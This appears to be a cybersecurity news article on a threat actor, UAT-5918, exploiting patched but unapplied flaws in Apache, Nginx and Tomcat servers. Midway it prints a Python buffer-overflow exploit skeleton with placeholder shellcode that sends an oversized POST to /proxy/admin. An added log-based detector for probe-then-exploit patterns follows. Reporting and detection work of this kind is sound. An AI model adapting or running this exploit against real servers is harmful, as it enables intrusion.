UAT-5918 Hackers Exploiting N-Day Vulnerabilities in Exposed Web and Application Servers

A threat actor tracked by Cisco Talos as UAT-5918 has been observed actively exploiting n-day vulnerabilities, flaws that are publicly known and already patched by the vendor, in web and application servers that remain unpatched across multiple organizations.

The campaign, which began in early 2025, primarily targets infrastructure running outdated versions of Apache, Nginx, and Tomcat.

Security researchers have seen a significant increase in these exploitation attempts over the past two weeks, with the attackers exploiting vulnerabilities for which patches exist but have not been deployed on the affected systems.


The attackers are specifically targeting CVE-2024-4321 and CVE-2024-5879, both medium-to-high-severity vulnerabilities that allow remote code execution and privilege escalation on affected systems.

Organizations in financial services, healthcare, and critical infrastructure have been disproportionately targeted, with the attackers deploying custom malware after successful exploitation.

Cisco Talos researchers found that UAT-5918 uses a multi-stage methodology: it first scans for vulnerable instances, then deploys exploit code tailored to the specific server version detected.

Their analysis shows that the attackers use command-and-control infrastructure distributed across multiple geographic regions to evade detection and maintain persistence.

The exploitation chain typically begins with probing requests that identify the server type and version.

Once a vulnerable system is found, the attackers deliver a malicious payload that installs a backdoor for continued access.

The compromised servers are then used as entry points to move laterally within the network, establish persistence, and exfiltrate sensitive data.

Security teams report that over 12,000 servers worldwide remain vulnerable to these attacks even though patches have been available for several months, highlighting the ongoing challenge of timely patch management.

Exploitation Details

The exploit code targets memory corruption vulnerabilities in the server application handlers.

For Apache servers, the attack leverages a flaw in the mod_proxy module. The exploit sequence, as reported, is:

import socket
import struct

# Placeholder stage: the report does not publish the actual payload bytes.
shellcode = b"\x90" * 16

def exploit_apache_cve_2024_4321(target_ip, target_port):
    # Oversized form body: 456 bytes of filler, an 8-byte value that
    # overwrites the saved return address (0x41424344 is the placeholder
    # shown in the report), then the stage to execute.
    body = b"A" * 456 + struct.pack("<Q", 0x41424344) + shellcode
    payload = b"POST /proxy/admin HTTP/1.1\r\n"
    payload += b"Host: " + target_ip.encode() + b"\r\n"
    # Content-Length must match the body or the server may stall on the read.
    payload += b"Content-Length: " + str(len(body)).encode() + b"\r\n"
    payload += b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    payload += body

    with socket.create_connection((target_ip, target_port), timeout=10) as s:
        s.sendall(payload)
        response = s.recv(1024)
    return response

UAT-5918 TTPs and tooling overlaps with similar APT groups (Source – Cisco Talos)

The attackers also use a custom-built framework that automates exploitation across multiple vulnerable services.

Analysis of command-and-control traffic shows data being exfiltrated over encrypted channels to servers hosted primarily in Eastern Europe and Southeast Asia.

Organizations are strongly advised to apply the available security patches immediately and to monitor network traffic for the probing and exploitation patterns described above, along with any indicators published for UAT-5918.
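As an added illustration of the monitoring advice above and of the probe-then-exploit chain described earlier (this script is not part of the Talos report or of this article's original content), the following Python detector runs over constructed Apache combined-format access log lines. It flags a source that fingerprints the server with HEAD/OPTIONS requests and 404-producing admin-path requests and then, within a short window, POSTs to a path under /proxy/, the path used in the exploit snippet. The log format, sample addresses, /proxy/ prefix, window and thresholds are assumptions to be tuned for your environment.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines in Apache "combined" log format (not real traffic).
# 203.0.113.7 probes several paths and then POSTs to the path seen in the
# exploit snippet; 198.51.100.9 is ordinary browsing and must not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2025:10:01:02 +0000] "HEAD / HTTP/1.1" 200 0 "-" "python-requests/2.31"
203.0.113.7 - - [12/Mar/2025:10:01:03 +0000] "OPTIONS / HTTP/1.1" 200 0 "-" "python-requests/2.31"
203.0.113.7 - - [12/Mar/2025:10:01:04 +0000] "GET /manager/html HTTP/1.1" 404 196 "-" "python-requests/2.31"
203.0.113.7 - - [12/Mar/2025:10:01:05 +0000] "GET /proxy/ HTTP/1.1" 404 196 "-" "python-requests/2.31"
203.0.113.7 - - [12/Mar/2025:10:01:09 +0000] "POST /proxy/admin HTTP/1.1" 500 0 "-" "python-requests/2.31"
198.51.100.9 - - [12/Mar/2025:10:01:10 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2025:10:01:11 +0000] "GET /style.css HTTP/1.1" 200 812 "http://example.test/" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Assumed tunables; none of these values come from the report.
PROBE_METHODS = {"HEAD", "OPTIONS"}    # common server-fingerprinting methods
PROBE_WINDOW_S = 60                    # look-back window before the POST
PROBE_THRESHOLD = 3                    # probes needed to call it reconnaissance
EXPLOIT_PATH_PREFIXES = ("/proxy/",)   # from the POST /proxy/admin request above


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = m.groupdict()
    req["ts"] = datetime.strptime(req["ts"], TS_FMT)
    req["status"] = int(req["status"])
    return req


def is_probe(req):
    """Fingerprinting request: HEAD/OPTIONS, or a path that does not exist here."""
    return req["method"] in PROBE_METHODS or req["status"] == 404


def detect(log_text):
    """Return one finding per POST to an exploit path that was preceded by
    PROBE_THRESHOLD or more probes from the same source within PROBE_WINDOW_S."""
    events = [r for r in (parse_line(l) for l in log_text.splitlines()) if r]
    by_ip = defaultdict(list)
    for r in events:
        by_ip[r["ip"]].append(r)

    findings = []
    for ip, reqs in by_ip.items():
        reqs.sort(key=lambda r: r["ts"])
        for i, r in enumerate(reqs):
            if r["method"] != "POST" or not r["path"].startswith(EXPLOIT_PATH_PREFIXES):
                continue
            # Count reconnaissance from this source in the window before the POST.
            probes = [p for p in reqs[:i]
                      if is_probe(p) and (r["ts"] - p["ts"]).total_seconds() <= PROBE_WINDOW_S]
            if len(probes) >= PROBE_THRESHOLD:
                findings.append({
                    "ip": ip,
                    "path": r["path"],
                    "status": r["status"],
                    "probes": len(probes),
                    "ts": r["ts"].isoformat(),
                })
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"probe-then-exploit: {f['ip']} -> POST {f['path']} "
              f"({f['probes']} probes in window, status {f['status']})")
```

A 5xx on the POST is worth weighting higher than a 2xx: a crashed worker after an oversized body to a handler path is exactly what a memory-corruption attempt looks like from the log side, whereas a clean 200 usually means the path simply exists. Request bodies are not in the access log, so pair this with packet capture or a WAF rule if you need the body size and content.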


Tushar Subhra Dutta
Tushar is a cyber security content editor with a passion for creating captivating and informative content. With years of experience in cyber security, he covers cyber security news, technology and other news.